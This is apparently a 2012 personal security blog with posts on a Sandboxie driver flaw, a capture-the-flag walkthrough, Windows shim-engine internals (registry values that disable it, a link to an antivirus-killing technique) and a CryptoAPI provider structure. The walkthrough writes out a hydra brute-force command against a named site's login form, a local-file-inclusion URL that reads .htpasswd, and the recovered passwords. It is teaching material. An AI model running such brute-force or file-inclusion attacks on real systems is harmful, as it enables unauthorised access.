0x16/7ton


Thursday, 13 December 2012

Sandboxie ProbeForWrite fail

Main article about it here:
Sandboxie Exploitation 
After some research into the Sandboxie driver I found a simple vulnerability.
For example, in the x86 driver (the bug exists on both architectures, x86 and x64).
See picture:

If a DelayLoadDll structure exists, the function must write the file path into a user-mode buffer.
Shown in the next picture:

Sunday, 21 October 2012

Attack-Secure Challenge

Recently I noticed a strange challenge and decided to solve it:
StrangeChallenge

So we have:
104 116 116 112 58 47 47 100 108 46 100 114 111 112 98 111 120 46 99 111 109 47
117 47 49 48 55 54 49 55 48 48 47 123 99 104 97 108 108 101 110 103 101 46 122
105 112 44 99 104 97 108 108 101 110 103 101 46 98 122 50 44 97 100 109 105 110
46 116 120 116 125


This is simply a sequence of numbers in the decimal system, so we convert them to hex and then to ASCII
(for example, I quickly wrote a Python script for this).

Obtain this url:
http://dl.dropbox.com/u/10761700/{challenge.zip,challenge.bz2,admin.txt}

Download everything that is offered :)

  • challenge.zip - a zip archive protected with a password
  • challenge.bz2 - an archive containing a file with no extension
  • admin.txt - contains a dictionary of passwords
OK, brute-forcing the archive with the dictionary gave nothing, so I began to study the file without an extension. The figure shows the file header:

So it is an AIFF sound track; after changing the extension I played it.
It played 11 seconds of an artist unknown to me :)
The first thought was to find the artist with the help of online services such as
Audio Tag, midomi etc.
But alas, nothing was found. Then I started looking for methods of concealing information in the track, and learned a lot about the AIFF format. I also asked a friend who has an iPhone to find the track with SoundHound.
Surprisingly, he quickly found the artist: it was Terranova - Just Enough.
I also studied the dump of the file in detail and found a funny hint in a comment:

Use this URL to easily find the ID of the album:
http://www.freedb.org/freedb_search.php
DiskID: 1603eb03

OK, the ID is the password to the encrypted archive.
Inside it, challenge.txt had contents of this form:

It can be seen that it is base64; decoding it gives JavaScript:

var _0x26fe=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x74\x68\x69\x63\x61\x6C\x2D\x69\x6E\x74\x72\x75\x73\x69\x6F\x6E\x2E\x63\x6F\x6D\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70"];
window[_0x26fe[0]]=_0x26fe[1]; 


This script redirects us to the site http://www.ethical-intrusion.com/login.php
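As an added example (not the author's script), here is a small decoder for the two encodings met so far: the decimal byte sequence at the start of the challenge, and the hex-escaped string array in the recovered script. Both inputs are copied from the post; the function names are my own.

```python
import re
from typing import List, Optional

# Decimal byte sequence as given in the challenge (copied from the post).
DECIMAL_SEQUENCE = (
    "104 116 116 112 58 47 47 100 108 46 100 114 111 112 98 111 120 46 99 111 109 47 "
    "117 47 49 48 55 54 49 55 48 48 47 123 99 104 97 108 108 101 110 103 101 46 122 "
    "105 112 44 99 104 97 108 108 101 110 103 101 46 98 122 50 44 97 100 109 105 110 "
    "46 116 120 116 125"
)

# The obfuscated script recovered from challenge.txt (copied from the post).
OBFUSCATED_JS = (
    r'var _0x26fe=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E",'
    r'"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x74\x68\x69\x63\x61\x6C'
    r'\x2D\x69\x6E\x74\x72\x75\x73\x69\x6F\x6E\x2E\x63\x6F\x6D\x2F\x69\x6E\x64'
    r'\x65\x78\x2E\x70\x68\x70"];window[_0x26fe[0]]=_0x26fe[1];'
)

def decode_decimal_ascii(text: str) -> str:
    """Interpret each whitespace-separated token as a decimal byte value."""
    values = [int(tok) for tok in text.split()]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("token outside the byte range 0-255")
    return bytes(values).decode("ascii")

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def unescape_js_hex(literal: str) -> str:
    """Resolve JavaScript \\xNN escapes into the characters they encode."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)

def decode_js_string_array(js: str) -> List[str]:
    """Return every double-quoted literal in the script with its escapes resolved."""
    return [unescape_js_hex(lit) for lit in re.findall(r'"((?:\\.|[^"\\])*)"', js)]

def redirect_target(js: str) -> Optional[str]:
    """For window[_0x26fe[0]]=_0x26fe[1] style code, return the URL assigned to location."""
    strings = decode_js_string_array(js)
    if "location" in strings:
        idx = strings.index("location")
        if idx + 1 < len(strings):
            return strings[idx + 1]
    return None

if __name__ == "__main__":
    print(decode_decimal_ascii(DECIMAL_SEQUENCE))
    print(redirect_target(OBFUSCATED_JS))
```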

Okay, we see a login/password form, so it's time to play with the dictionary :)
I brute-forced it with hydra like this:
hydra -l admin -P dictionary.txt -s 80 -f www.ethical-intrusion.com http-post-form "/login.php:username=^USER^&password=^PASS^&submit=login:The username/password combination you have entered is invalid"

The brute force was a success, and the password was found: m0use456g
Inside was a list of news items, one of which was a YouTube video with a talking guy :)
The problem was that he was clearly speaking backwards, so I downloaded the video, extracted the audio track and reversed it.
In the end, he tells me the name of a directory: a98dhkjd

I tried to open www.ethical-intrusion.com/a98dhkjd/
but it gave me a standard Apache .htaccess authorization prompt.
Brute-forcing gave nothing, so I began to study the web panel and found a local file inclusion (LFI) vulnerability in it:
http://www.ethical-intrusion.com/index.php?news=[lfi]
Combining this with what is known about the directory, we obtain the logical include:
http://www.ethical-intrusion.com/index.php?news=a98dhkjd/.htaccess
It works :)
       AuthFile a98dhkjd/.htpasswd 
http://www.ethical-intrusion.com/index.php?news=a98dhkjd/.htpasswd 
       pilou:there1s

After authorization we see this text: 
 Wow, seems like you're done?

Jy het die uitdaging suksesvol voltooi.
Die wagwoord is:
"Dit is net die begin."


Google Translate says it is a
South African dialect, so translating it gives:

You have successfully completed the challenge.
The password is:
"This is just the beginning."


Yeah, it's done :)

Wednesday, 3 October 2012

A little about shims engine

I begin with these lines from the book Windows Internals, Sixth Edition (Mark Russinovich, David A. Solomon, Alex Ionescu):
"...Additionally,allowing mechanisms such as the shim engine to use its usual hooking and memory-patching techniques on a protected process would result in a security hole if someone could figure how to insert arbitrary shims that modify the behavior of the protected process. Additionally, because the Shim Engine is installed by the parent process, which might not have access to its child protected process,even legitimate shimming cannot work...."
So I wrote an article about an unconventional use of shims; read it here: AVkillingWithShims

A good analysis of shim internals can be read here:
http://www.alex-ionescu.com/?m=200705
Some additional info.
How the function IsShimInfrastructureDisabled works:
it simply queries registry keys; if at least one of the following values exists, the shim engine will not work:
<\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option>
    OptionValue
<\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility>
    DisableAppCompat
<\Registry\MACHINE\Software\Policies\Microsoft\Windows\AppCompat>
    DisableEngine
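An added audit check (my own code, not from the post or from Windows) that applies the rule above: the native `\Registry\MACHINE` prefix maps to HKEY_LOCAL_MACHINE, and the check reports which of the three values are present. The decision logic takes a reader callable so it can be tested without a Windows registry; the real reader assumes the `winreg` module.

```python
from typing import Callable, List, Tuple

# Registry values that IsShimInfrastructureDisabled looks for, as listed in the post.
# "\Registry\MACHINE\..." in native paths corresponds to HKEY_LOCAL_MACHINE.
SHIM_DISABLE_VALUES: List[Tuple[str, str]] = [
    (r"SYSTEM\CurrentControlSet\Control\SafeBoot\Option", "OptionValue"),
    (r"SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatibility", "DisableAppCompat"),
    (r"SOFTWARE\Policies\Microsoft\Windows\AppCompat", "DisableEngine"),
]

def shim_engine_disabled(value_exists: Callable[[str, str], bool]) -> List[Tuple[str, str]]:
    """Return the (subkey, value) pairs that exist under HKLM.

    Following the rule in the post, a non-empty result means the shim engine
    is disabled; the caller learns which value is responsible.
    """
    return [(subkey, name) for subkey, name in SHIM_DISABLE_VALUES
            if value_exists(subkey, name)]

def hklm_value_exists(subkey: str, name: str) -> bool:
    """Reader for Windows hosts (assumes winreg); elsewhere nothing is found."""
    try:
        import winreg
    except ImportError:
        return False
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
            winreg.QueryValueEx(key, name)
        return True
    except OSError:
        # Key or value missing (or access denied): treat as not present.
        return False

if __name__ == "__main__":
    hits = shim_engine_disabled(hklm_value_exists)
    if hits:
        print("shim engine disabled by:", hits)
    else:
        print("no disabling values found; shim engine is active")
```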


Thursday, 12 April 2012

CryptProv struct



HCRYPTPROV+8h   [offset CPGenKey]
HCRYPTPROV+0Ch  [offset CPDeriveKey]
HCRYPTPROV+10h  [offset CPDestroyKey]
HCRYPTPROV+14h  [offset CPSetKeyParam]
HCRYPTPROV+18h  [offset CPGetKeyParam]
HCRYPTPROV+1Ch  [offset CPExportKey]
HCRYPTPROV+20h  [offset CPImportKey]
HCRYPTPROV+24h  [offset CPEncrypt]
HCRYPTPROV+28h  [offset CPDecrypt]
HCRYPTPROV+60h  [offset CPDuplicateKey]
HCRYPTPROV+70h  addrStruct ^ (a2491d83)
HCRYPTPROV+74h  reserved [11111111]
addrStruct+0h   Reserved [DEADBEEF]
addrStruct+4h   type
addrStruct+8h   pointer to string: "Microsoft DH SChannel Cryptographic Provider"